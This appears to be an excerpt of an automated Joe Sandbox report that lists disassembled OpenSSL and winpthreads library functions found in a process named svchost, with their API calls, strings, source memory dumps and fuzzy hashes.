                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrlR_newR_set_debug
                                                                                              • String ID: dtls1_check_timeout_num$ssl\d1_lib.c
                                                                                              • API String ID: 2442628283-4185249889
                                                                                              • Opcode ID: b1a9a4547ff906208184b0367555025d3ef1f003377d235aedb0efbc53b3a662
                                                                                              • Instruction ID: 015955793a6a183f37bc60a6b72266434bae34ef3294b975a202eece2bf4fdeb
                                                                                              • Opcode Fuzzy Hash: b1a9a4547ff906208184b0367555025d3ef1f003377d235aedb0efbc53b3a662
                                                                                              • Instruction Fuzzy Hash: CF1186B2E1A241C2E792AB75D4926FC3361EF84F44F488536DE2D477A5DF289581C704
                                                                                              Function 00007FFBAB4428F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_MD_get0_name.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435A0
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435B8
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435D4
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435EC
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435FD
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443605
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB44279E), ref: 00007FFBAB44295E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB44279E), ref: 00007FFBAB442974
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get0_nameF_freeR_set_errorR_vset_errorX_free
                                                                                              • String ID: finished$ssl\tls13_enc.c$tls13_hkdf_expand
                                                                                              • API String ID: 3505470307-1348237582
                                                                                              • Opcode ID: cf3ea33bb4df626c872050f9431ae6102b77338d0bd7d74f79670d10d5f2bc83
                                                                                              • Instruction ID: f0a01cae23ac9f48f14447d773fe37ac390a343c496f37374904f158cc409b52
                                                                                              • Opcode Fuzzy Hash: cf3ea33bb4df626c872050f9431ae6102b77338d0bd7d74f79670d10d5f2bc83
                                                                                              • Instruction Fuzzy Hash: 1C11ACB2A19B8282D711CB25F4802AEB3A4FB88B84F108035EE9C43779DF38C1548B00
                                                                                              Function 00007FFBAB4380C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_set_tlsext_max_fragment_length$ssl\t1_lib.c
                                                                                              • API String ID: 1552677711-2905481694
                                                                                              • Opcode ID: 96a378446cbcedc236a4590c260003e5772c2196b86349007bfbe9f0451898d9
                                                                                              • Instruction ID: 0981f6dec0455495f4f70a0b026b3965e6b7676f301c037d346b3a1ca67cccd7
                                                                                              • Opcode Fuzzy Hash: 96a378446cbcedc236a4590c260003e5772c2196b86349007bfbe9f0451898d9
                                                                                              • Instruction Fuzzy Hash: AF016DAAE4B14246FEA2E635C4933B95B429F11740F98C431DC3C835F2DD1EA94D8711
                                                                                              Function 64943360 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 649433B6
                                                                                              • (, xrefs: 649433AE
                                                                                              • Assertion failed: (%s), file %s, line %d, xrefs: 649433C8
                                                                                              • (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 649433C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: __iob_func
                                                                                              • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                                                                                              • API String ID: 686374508-3651547468
                                                                                              • Opcode ID: 7bff3dde8ce2c9ddfee02efadf41117ec0380b55c006dc73d75c7ed4cc5f8649
                                                                                              • Instruction ID: 49758d916bec52361b93001baeb39d1493085cd40ca709cf8d0fcfd1233c8ec3
                                                                                              • Opcode Fuzzy Hash: 7bff3dde8ce2c9ddfee02efadf41117ec0380b55c006dc73d75c7ed4cc5f8649
                                                                                              • Instruction Fuzzy Hash: AA01493679150996EB14EF39E89478E3BA1F795B58FC98022C90C47320DF39C99BC7A0
                                                                                              Function 00007FFBAB45A3B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_LH_set_down_load.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3CF
                                                                                              • OPENSSL_LH_doall_arg.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3E2
                                                                                              • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3EE
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45A6FB,?,00007FFBAB44B921), ref: 00007FFBAB45A3F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_deleteH_doall_argH_freeH_set_down_load
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 473658108-3923830422
                                                                                              • Opcode ID: 550a5efd96314d58762f6876004fea294068b4d5f562269aa692825f48097bde
                                                                                              • Instruction ID: 704cc43c5b1fdd8d09df93cf5cc923408a769234cd8a2993476f736a5cdef4d4
                                                                                              • Opcode Fuzzy Hash: 550a5efd96314d58762f6876004fea294068b4d5f562269aa692825f48097bde
                                                                                              • Instruction Fuzzy Hash: D6F03091A49A8291EA15DB73D58517C6311EF84BC4F04C431DE2D477B6DE2CE4654300
                                                                                              Function 00007FFBAB417BB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl3_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 1552677711-3530330221
                                                                                              • Opcode ID: 7f6e9c6a5dc6c22308ddeae4405c50707ab7f2d4f3ce7b084941153460be6735
                                                                                              • Instruction ID: 5c4ea1f9104bae82a2bbd21deffa34649854026aa4a62dc380a342be1943838c
                                                                                              • Opcode Fuzzy Hash: 7f6e9c6a5dc6c22308ddeae4405c50707ab7f2d4f3ce7b084941153460be6735
                                                                                              • Instruction Fuzzy Hash: 6DF090F1A0A65182E652A771F4425BE2311FB44794F90C433CE6C46ABADE2CE946C701
                                                                                              Function 00007FFBAB4682C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_tx_packetiser_set_cur_scid$ssl\quic\quic_txp.c
                                                                                              • API String ID: 1552677711-511327206
                                                                                              • Opcode ID: e1ec513cdd55cfe22c2372d47e70bf3bb4db6be4834082c20f93e2e0cd97b14e
                                                                                              • Instruction ID: 4ba95f397c9ea6ac92c86c1322b7cc5eb56b986b197f6e5ebc86886e6741778b
                                                                                              • Opcode Fuzzy Hash: e1ec513cdd55cfe22c2372d47e70bf3bb4db6be4834082c20f93e2e0cd97b14e
                                                                                              • Instruction Fuzzy Hash: 03F090E5E1B24186E757A738C4422BC2761EB60704F90C431DA28422A2EE2CE6CA8711
                                                                                              Function 00007FFBAB468250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_tx_packetiser_set_cur_dcid$ssl\quic\quic_txp.c
                                                                                              • API String ID: 1552677711-1342796716
                                                                                              • Opcode ID: b676c201c19b32777ab857dc901ce1c02518863092e0f94fc704b0cd12d4367e
                                                                                              • Instruction ID: ff066c910f80a9fc787e366771400a59b11459a6752fe2796dddba72509838f6
                                                                                              • Opcode Fuzzy Hash: b676c201c19b32777ab857dc901ce1c02518863092e0f94fc704b0cd12d4367e
                                                                                              • Instruction Fuzzy Hash: 44F0B4E6E1A18186E757E738C4422BD27A1EB64304F90C431DE1C422B2EE2CE6DAC711
                                                                                              Function 00007FFBAB465BB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: quic_app_data_pending$ssl\quic\quic_tls.c
                                                                                              • API String ID: 1552677711-2758597072
                                                                                              • Opcode ID: c6541a24facb843c180e84527372b45acbe469c5389978cc7739567c9c7bdf9a
                                                                                              • Instruction ID: 777fdf0e2ea99ed773f088904efb8397c228a6bd685cb33c8c7da809df243477
                                                                                              • Opcode Fuzzy Hash: c6541a24facb843c180e84527372b45acbe469c5389978cc7739567c9c7bdf9a
                                                                                              • Instruction Fuzzy Hash: 63F01CB1B4B6028AFBA6E771D8967BD2690DF00744F54D435DE2E826B2DE2C948A8601
                                                                                              Function 00007FFBAB465C90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: quic_increment_sequence_ctr$ssl\quic\quic_tls.c
                                                                                              • API String ID: 1552677711-2984182107
                                                                                              • Opcode ID: a18d62372108c2788068f0f0b3773232386b8f54d5049e8a98859044ff6e5735
                                                                                              • Instruction ID: 25d964e1a3a7cf561d6d0b78f5cd7f05a8f6c6f485d523f73320c76dce1e45d1
                                                                                              • Opcode Fuzzy Hash: a18d62372108c2788068f0f0b3773232386b8f54d5049e8a98859044ff6e5735
                                                                                              • Instruction Fuzzy Hash: A9F082B1B0710286FBA2E770C4923BD26509F00704F54C430DD2D826B1DE3C9489C701
                                                                                              Function 00007FFBAB430860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_use_PrivateKey$ssl\ssl_rsa.c
                                                                                              • API String ID: 1552677711-2258079080
                                                                                              • Opcode ID: 786441c3b64e9e5c4d15a254dc6e0d0d5d050303a3e97e7add92983b2aade78b
                                                                                              • Instruction ID: e4dec301e71fc7ce6bb42fe25afb8345c23d9133d90b23b571eb46b70c6108a1
                                                                                              • Opcode Fuzzy Hash: 786441c3b64e9e5c4d15a254dc6e0d0d5d050303a3e97e7add92983b2aade78b
                                                                                              • Instruction Fuzzy Hash: 95E06DA5E5B54282E656E376C8832FE12519F50384FA4C435ED2D826B2AE1CA58A8601
                                                                                              Function 00007FFBAB47A860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl\record\methods\tlsany_meth.c$tls_any_set_crypto_state
                                                                                              • API String ID: 1552677711-1973945482
                                                                                              • Opcode ID: 0598e60b06366ad03e52f3ea5767825b42a0d0e7aeb2374eade444e93b0f0ddf
                                                                                              • Instruction ID: 6258d128c2b1247a6578a3cd638444b22fdbf4fe2b4dec5fe95c8fda3c54c109
                                                                                              • Opcode Fuzzy Hash: 0598e60b06366ad03e52f3ea5767825b42a0d0e7aeb2374eade444e93b0f0ddf
                                                                                              • Instruction Fuzzy Hash: 8CE01AA9E5A14282F666A339C8A26BD2211AF90300FE4C531ED2D426F2EE1CE94D8641
                                                                                              Function 00007FFBAB43A130 Relevance: 7.6, APIs: 5, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • X509_get0_pubkey.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A183
                                                                                              • EVP_PKEY_get_security_bits.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A190
                                                                                              • X509_get0_pubkey.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A1D2
                                                                                              • EVP_PKEY_get_security_bits.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A1DF
                                                                                              • X509_get_signature_info.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFBAB41D570), ref: 00007FFBAB43A253
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_get0_pubkeyY_get_security_bits$X509_get_signature_info
                                                                                              • String ID:
                                                                                              • API String ID: 3773881001-0
                                                                                              • Opcode ID: 484340bd9b23e6ba0e5baea181da7954af29bdda51387c808e050ab38c3b22cf
                                                                                              • Instruction ID: 055febd8143693f58ed647039583a0edf9923d880d151e8c7d49821891c39249
                                                                                              • Opcode Fuzzy Hash: 484340bd9b23e6ba0e5baea181da7954af29bdda51387c808e050ab38c3b22cf
                                                                                              • Instruction Fuzzy Hash: 594181A3A4E7C246FA769A75E441BBE6280BF94784F0CC035ED6D477A6DE3DD4048701
                                                                                              Function 649464A0 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$CreateSemaphore
                                                                                              • String ID:
                                                                                              • API String ID: 4016566793-0
                                                                                              • Opcode ID: 589d0227ed7358cdbab2bd92d4174e6ec32cd5d37d7a8e4e3cf95ff430ec2371
                                                                                              • Instruction ID: b79095f19616a0e1c0eed2ee7e78f77239b15f2aeb5a75ddd7e641c4488f5580
                                                                                              • Opcode Fuzzy Hash: 589d0227ed7358cdbab2bd92d4174e6ec32cd5d37d7a8e4e3cf95ff430ec2371
                                                                                              • Instruction Fuzzy Hash: 9011B1B2BC56008AF7195F39D9003492AA6AB9ABB4F189324CE29433C4DF3CCC51CB60
                                                                                              Function 64947570 Relevance: 7.6, APIs: 5, Instructions: 57timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 649475B5
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 649475C0
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 649475C8
                                                                                              • GetTickCount.KERNEL32 ref: 649475D0
                                                                                              • QueryPerformanceCounter.KERNEL32 ref: 649475DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: ea8bfe2061e22a54fb9383ec99bc53ec21c7b77bb38b29a6e5ad63f23be09ef5
                                                                                              • Instruction ID: 0c0c2922cb4178c1b0210dc40f9cacb2f98c604e546ea9db0ef1c374853c2b83
                                                                                              • Opcode Fuzzy Hash: ea8bfe2061e22a54fb9383ec99bc53ec21c7b77bb38b29a6e5ad63f23be09ef5
                                                                                              • Instruction Fuzzy Hash: 6D11A322791B5486F711AB29FD0835663A2B789BE4F181274DE6D47BA4EB3CC896C310
                                                                                              Function 649465A0 Relevance: 7.6, APIs: 5, Instructions: 54sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32 ref: 649465CE
                                                                                              • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 64946602
                                                                                              • Sleep.KERNEL32(?,?,?,?,649416A0), ref: 649465F7
                                                                                                • Part of subcall function 64943070: CloseHandle.KERNEL32 ref: 6494308F
                                                                                              • _errno.MSVCRT ref: 6494662C
                                                                                              • _errno.MSVCRT ref: 6494663F
                                                                                              Memory Dump Source
